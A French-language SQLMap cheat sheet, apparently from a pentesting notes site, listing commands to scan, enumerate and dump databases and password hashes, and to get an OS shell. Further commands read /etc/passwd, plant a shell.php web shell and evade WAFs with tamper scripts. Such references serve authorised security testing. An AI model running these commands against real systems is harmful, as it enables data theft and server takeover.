Paks3c

Appearance

Objectif : SQLMap est un outil open-source d'audit de sécurité et de test de pénétration qui automatise le processus de détection et d'exploitation des vulnérabilités d'injection SQL, permettant ainsi de prendre le contrôle des serveurs de bases de données.

Source : https://github.com/sqlmapproject/sqlmap | http://sqlmap.org/

OPSEC : SQLMap peut générer un trafic très important et suspect. Son utilisation est facilement détectable par les WAFs (Web Application Firewalls), IDS/IPS et les équipes de sécurité si des précautions (tampers, délais, user-agent aléatoire) ne sont pas prises.

🎯 Ciblage et Scan de Base

Spécifier une URL cible (paramètre GET)

bash
sqlmap -u "[http://exemple.com/produits?id=1](http://exemple.com/produits?id=1)"
  • Contexte : Lance un scan de base sur l'URL fournie, testant les paramètres GET (ici id).
  • Usage : Point d'entrée le plus simple pour tester une URL.

Spécifier une URL cible avec des données POST

bash
sqlmap -u "[http://exemple.com/login](http://exemple.com/login)" --data="username=admin&password=pass"
  • Contexte : Teste les paramètres envoyés dans le corps d'une requête POST.
  • Usage : Pour les formulaires de connexion, de recherche, etc.

Analyser une requête depuis un fichier (Burp Suite, ZAP)

bash
sqlmap -r request.txt
  • Contexte : Lit une requête HTTP complète (y compris les en-têtes, cookies, méthode POST/GET) depuis un fichier texte.
  • Usage : Très pratique pour rejouer et tester des requêtes complexes interceptées avec un proxy comme Burp Suite ou ZAP.

Spécifier un paramètre spécifique à tester

bash
sqlmap -u "[http://exemple.com/produits?id=1&cat=2](http://exemple.com/produits?id=1&cat=2)" -p id
  • Contexte : Ne teste que le paramètre id pour l'injection SQL, ignorant les autres (cat ici).
  • Usage : Accélérer le scan en se concentrant sur un paramètre jugé potentiellement vulnérable.
bash
sqlmap -u "[http://exemple.com/profil?id=1](http://exemple.com/profil?id=1)" --cookie="sessionid=abcdef12345"
  • Contexte : Inclut le cookie spécifié dans toutes les requêtes, permettant de tester des pages nécessitant une authentification.
  • Usage : Essentiel pour auditer des zones authentifiées d'une application web.

⚙️ Ajustement du Scan (Niveau et Risque)

Augmenter le niveau de test (plus de payloads/types d'injection)

bash
sqlmap -r request.txt --level=5
  • Contexte : Augmente la profondeur des tests. level va de 1 (défaut) à 5 (maximum). Un niveau plus élevé teste plus de types d'injections (ex: time-based blind, injections dans les en-têtes comme User-Agent, Referer).
  • Usage : Pour des scans plus exhaustifs, mais plus lents et potentiellement plus bruyants.

Augmenter le risque (tests potentiellement plus dangereux)

bash
sqlmap -r request.txt --risk=3
  • Contexte : Augmente l'agressivité des tests. risk va de 1 (défaut) à 3 (maximum). Un risque plus élevé utilise des payloads qui pourraient potentiellement modifier des données ou causer des erreurs (ex: injections SQL lourdes).
  • Usage : À utiliser avec prudence, surtout sur des environnements de production.

[!Astuce] Combiner --level=5 --risk=3 permet le scan le plus complet possible, mais aussi le plus lent et le plus risqué/bruyant.

🔎 Énumération de la Base de Données

Une fois qu'une injection est confirmée, ces commandes permettent d'explorer la structure et le contenu de la base de données.

Lister les bases de données disponibles

bash
sqlmap -r request.txt --dbs

Lister les tables d'une base de données spécifique

bash
sqlmap -r request.txt -D <nom_db> --tables

Lister les colonnes d'une table spécifique

bash
sqlmap -r request.txt -D <nom_db> -T <nom_table> --columns

Obtenir l'utilisateur actuel de la base de données

bash
sqlmap -r request.txt --current-user

Obtenir le nom de la base de données actuelle

bash
sqlmap -r request.txt --current-db

Vérifier si l'utilisateur actuel est administrateur (DBA)

bash
sqlmap -r request.txt --is-dba

Tenter de dumper les hashes des mots de passe (si possible)

bash
sqlmap -r request.txt --passwords
  • Prérequis : Nécessite souvent des privilèges élevés et dépend du type de SGBD.

💾 Dump des Données

Dumper le contenu d'une table

bash
sqlmap -r request.txt -D <nom_db> -T <nom_table> --dump

Dumper des colonnes spécifiques d'une table

bash
sqlmap -r request.txt -D <nom_db> -T <nom_table> -C <col1,col2> --dump

Dumper toutes les tables de toutes les bases de données

bash
sqlmap -r request.txt --dump-all
  • Usage : Très long et bruyant, à utiliser avec parcimonie.

💥 Exploitation (Accès Système)

[!Attention] Ces actions sont très intrusives et nécessitent généralement que l'utilisateur de la base de données ait des privilèges très élevés (DBA) et que le SGBD soit configuré de manière permissive.

Obtenir un shell interactif sur le système d'exploitation via la base de données

bash
sqlmap -r request.txt --os-shell
  • Contexte : Tente d'uploader un petit shell (via différentes techniques selon le SGBD : xp_cmdshell sur MSSQL, UDF sur MySQL/PostgreSQL, etc.) et d'obtenir une invite de commande interactive sur le serveur hébergeant la base de données.
  • Prérequis : Privilèges DBA, SGBD et OS compatibles.

Exécuter une commande OS unique

bash
sqlmap -r request.txt --os-cmd="<commande>"
# Exemple: sqlmap -r req.txt --os-cmd="whoami"

Obtenir un shell SQL interactif

bash
sqlmap -r request.txt --sql-shell
  • Contexte : Permet d'exécuter des requêtes SQL arbitraires directement sur la base de données.
  • Usage : Utile pour une exploration manuelle ou des opérations non prévues par les options de dump standard.

Lire un fichier sur le serveur

bash
sqlmap -r request.txt --file-read "<chemin_fichier_distant>"
# Exemple: sqlmap -r req.txt --file-read "/etc/passwd"
  • Prérequis : Privilèges de lecture de fichiers pour l'utilisateur de la base de données (ex: FILE sur MySQL, pg_read_server_files sur PostgreSQL).

Écrire un fichier local sur le serveur

bash
sqlmap -r request.txt --file-write "<fichier_local>" --file-dest "<chemin_destination_distant>"
# Exemple: sqlmap -r req.txt --file-write "shell.php" --file-dest "/var/www/html/uploads/shell.php"
  • Prérequis : Privilèges d'écriture de fichiers pour l'utilisateur de la base de données.

🛠️ Techniques et Tuning

Forcer une technique d'injection spécifique

bash
sqlmap -r request.txt --technique=<lettre>
# B: Boolean-based blind
# E: Error-based
# U: Union query-based
# S: Stacked queries
# T: Time-based blind
# Q: Inline queries (rare)
# Exemple: sqlmap -r req.txt --technique=U # Force UNION
  • Usage : Utile si on sait quel type d'injection fonctionne ou pour accélérer le scan en évitant des techniques inutiles.

Spécifier le SGBD cible

bash
sqlmap -r request.txt --dbms=<sgbd>
# Exemples: --dbms=mysql, --dbms=mssql, --dbms=postgresql, --dbms=oracle
  • Usage : Accélère le scan en ne testant que les payloads spécifiques au SGBD indiqué.

Augmenter le nombre de threads (parallélisation)

bash
sqlmap -r request.txt --threads=10
  • Usage : Accélère le scan, mais augmente la charge sur le serveur cible et le risque de détection.

Mode non interactif (répond 'oui' par défaut)

bash
sqlmap -r request.txt --batch
  • Usage : Utile pour les scans automatisés ou longs où l'on ne souhaite pas répondre manuellement aux questions de SQLMap.

Utiliser un User-Agent aléatoire

bash
sqlmap -r request.txt --random-agent
  • Usage : Tente de masquer l'empreinte de SQLMap en utilisant des User-Agents variés.

🛡️ Contournement de WAF (Web Application Firewall)

Utiliser des scripts de manipulation (tampers)

bash
sqlmap -r request.txt --tamper=<script1,script2,...>
  • Contexte : Les tampers modifient les payloads SQL envoyés par SQLMap pour tenter de contourner les règles de détection des WAFs.
  • Usage : Essentiel lorsque l'application est protégée par un WAF. Il faut souvent tester plusieurs combinaisons.
  • Exemples de tampers courants :
    • space2comment : Remplace les espaces par /**/.
    • base64encode : Encode le payload en Base64.
    • chardoubleencode : Double encodage URL des caractères.
    • between : Remplace > par NOT BETWEEN 0 AND.
    • randomcase : Change la casse des mots-clés SQL (ex: SELECT -> SeLeCt).
  • Lister les tampers disponibles : sqlmap --list-tampers

Ajouter un préfixe/suffixe aux payloads

bash
sqlmap -r request.txt --prefix="')" --suffix="-- -"
  • Contexte : Ajoute des caractères avant (prefix) ou après (suffix) le payload injecté.
  • Usage : Utile pour fermer correctement des guillemets ou des parenthèses dans la requête SQL originale, ou pour commenter la fin de la requête.

Réinitialiser la session SQLMap (vider le cache)

bash
sqlmap -r request.txt --flush-session
  • Contexte : SQLMap sauvegarde les résultats et les informations de session pour éviter de refaire les mêmes tests.
  • Usage : Forcer SQLMap à recommencer les tests depuis le début pour une cible donnée, utile si la configuration a changé ou si on veut essayer des options différentes.